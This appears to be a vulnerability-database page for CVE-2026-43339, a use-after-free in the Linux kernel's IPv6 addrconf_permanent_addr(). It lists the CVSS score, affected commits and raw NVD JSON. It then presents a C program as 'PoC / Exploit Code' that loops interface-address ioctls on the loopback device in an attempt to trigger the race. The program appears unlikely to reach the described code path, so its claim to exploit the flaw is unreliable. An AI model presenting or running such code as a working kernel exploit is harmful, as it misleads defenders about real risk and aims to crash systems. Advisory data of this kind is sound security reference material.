Security Vulnerability Report
CVE-2026-43339 CVSS 7.8 HIGH

CVE-2026-43339

Published: 2026-05-08 14:16:44
Last Modified: 2026-05-11 08:16:10
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ipv6: prevent possible UaF in addrconf_permanent_addr()

The mentioned helper tries to warn the user about an exceptional condition, but the message is delivered too late, accessing the ipv6 after its possible deletion.

Reorder the statement to avoid the possible UaF; while at it, place the warning outside the idev->lock as it needs no protection.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel < commit 7d9f2f4aabd116ca68fbdab5d8fb8dac74c2ea1e
Linux Kernel < commit 7bfafa1b0cd582983ebec6bb20f0a435528fe567
Linux Kernel < commit 3cd4efb5df72843dfac892d0b3c7a4a8bd926b65
Linux Kernel < commit 2d88ed7fa000e19c2dc0fa31b3a849e3f5bca5c1
Linux Kernel < commit 25357b670afb5b517096da783abaa5cc4bf8359e

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2026-43339 PoC Concept
// This PoC demonstrates the context of the vulnerability in Linux Kernel IPv6 handling.
// Note: Triggering the specific UaF requires exact kernel version and race condition timing.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>   // ioctl() and the SIOC* request codes
#include <sys/socket.h>
#include <linux/if.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define IPV6_ADDR_GEN_MODE 0

int main(void)
{
    int sock;
    struct ifreq ifr;
    struct sockaddr_in6 addr;

    // Create a socket for IPv6 communication
    sock = socket(AF_INET6, SOCK_DGRAM, 0);
    if (sock < 0) {
        perror("socket");
        return 1;
    }

    // Setup interface name (e.g., eth0)
    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); // Using loopback for safety

    // Attempt to trigger addrconf_permanent_addr logic
    // by manipulating IPv6 addresses rapidly to induce the race condition.
    memset(&addr, 0, sizeof(addr));
    addr.sin6_family = AF_INET6;
    inet_pton(AF_INET6, "::1", &addr.sin6_addr);
    // struct sockaddr_in6 is larger than ifr.ifr_addr; copy only what fits
    // so the write stays inside ifr.
    memcpy(&ifr.ifr_addr, &addr, sizeof(ifr.ifr_addr));

    // Loop to stress the address configuration path
    for (int i = 0; i < 1000; i++) {
        ioctl(sock, SIOCSIFADDR, &ifr);
        ioctl(sock, SIOCDIFADDR, &ifr);
    }

    close(sock);
    printf("PoC execution finished. Check kernel logs for crashes.\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43339", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T14:16:43.777", "lastModified": "2026-05-11T08:16:10.293", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: prevent possible UaF in addrconf_permanent_addr()\n\nThe mentioned helper try to warn the user about an exceptional\ncondition, but the message is delivered too late, accessing the ipv6\nafter its possible deletion.\n\nReorder the statement to avoid the possible UaF; while at it, place the\nwarning outside the idev->lock as it needs no protection."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/25357b670afb5b517096da783abaa5cc4bf8359e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/2d88ed7fa000e19c2dc0fa31b3a849e3f5bca5c1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/3cd4efb5df72843dfac892d0b3c7a4a8bd926b65", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/7bfafa1b0cd582983ebec6bb20f0a435528fe567", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/7d9f2f4aabd116ca68fbdab5d8fb8dac74c2ea1e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/bacc7f31085c9820922f00bc7d79756ffa13123a", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/eec49a33611f20336b357b3953df44f1a02049e8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/fd63f185979b047fb22a0dfc6bd94d0cab6a6a70", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}